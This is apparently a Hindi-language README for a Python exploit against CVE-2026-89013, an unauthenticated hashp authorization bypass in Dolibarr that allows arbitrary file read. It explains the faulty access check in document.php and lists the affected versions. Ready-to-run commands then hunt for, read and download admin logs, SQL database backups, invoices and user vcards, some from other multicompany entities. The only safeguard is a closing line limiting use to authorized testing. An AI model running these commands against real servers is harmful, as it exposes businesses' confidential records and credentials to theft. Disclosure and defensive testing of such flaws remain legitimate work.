
CVE-2026-89013 के लिए Python exploit, जो एक unauthenticated Dolibarr hashp authorization bypass है और arbitrary file read को सक्षम बनाता है, जिसमें check, list, hunt, read, और download मोड हैं।
CVE-2026-89013 के लिए एक्सप्लॉइट: document.php और viewimage.php hashp पैरामीटर मौजूद होने पर NOLOGIN को बाध्य करते हैं। आंतरिक मार्कर मान shared शेयर-टोकन रिज़ॉल्यूशन को छोड़ देता है, लेकिन एक्सेस-कंट्रोल ओवरराइड किसी भी गैर-रिक्त मान के लिए अभी भी सक्रिय होता है और $accessallowed = 1 सेट करता है, जिससे dol_check_secure_access_document() का परिणाम खारिज हो जाता है। इसलिए एक अनधिकृत अनुरोध हर modulepart ट्री में किसी भी फ़ाइल को पढ़ सकता है: व्यावसायिक दस्तावेज़, एडमिन लॉग, SQL बैकअप (modulepart=systemtools), कस्टम मॉड्यूल स्रोत (modulepart=packages), और के माध्यम से अन्य multicompany एंटिटीज़।
&entity=N| प्रभावित | Dolibarr 23.0.4 – 24.0.0 |
| ठीक किया गया | 24.0.1 |
| पूर्वापेक्षाएँ | कोई नहीं (अनधिकृत) |
| प्रभाव | Dolibarr की प्रबंधित निर्देशिकाओं के भीतर मनमाना फ़ाइल पठन |
// htdocs/document.php:189 (24.0.0) — 'shared' skips token resolution
if (!empty($hashp) && $hashp != 'shared') { ...resolve share token... }
// htdocs/document.php:292 — but any hashp forces access
if (!empty($hashp)) {
$accessallowed = 1;
$sqlprotectagainstexternals = '';
}
कमिट 5028dae981e (2026-08-12) का एक रिग्रेशन, जो पहली बार 23.0.4 और 24.0.0 में शिप किया गया। ट्रैवर्सल (../) सर्वर-साइड पर सैनिटाइज़ किया जाता है — यह एक प्राधिकरण बायपास है, पाथ ट्रैवर्सल नहीं।
# detection (safe, nonexistent canary file)
python3 CVE-2026-89013.py https://erp.local check
# readable modulepart trees
python3 CVE-2026-89013.py https://erp.local list
# hunt: dolibarr.log + SQL backups (generated filenames) + user vcards
python3 CVE-2026-89013.py https://erp.local hunt --db-name dolibarr --days 3 --save
# read / download
python3 CVE-2026-89013.py https://erp.local read logs/admin/logs/dolibarr.log
python3 CVE-2026-89013.py https://erp.local download systemtools/backup/backup.sql
python3 CVE-2026-89013.py https://erp.local read facture/FA2601-0001/FA2601-0001.pdf --entity 2
# PDFs via viewimage.php
python3 CVE-2026-89013.py https://erp.local viewimage facture/FA2601-0001/FA2601-0001.pdf
केवल मानक लाइब्रेरी (Python 3.8+)। --proxy, --insecure, --timeout का समर्थन करता है।

केवल अधिकृत परीक्षण और अनुसंधान के लिए। केवल उन सिस्टमों के विरुद्ध उपयोग करें जिनके आप स्वामी हैं या जिनका परीक्षण करने की आपके पास स्पष्ट अनुमति है।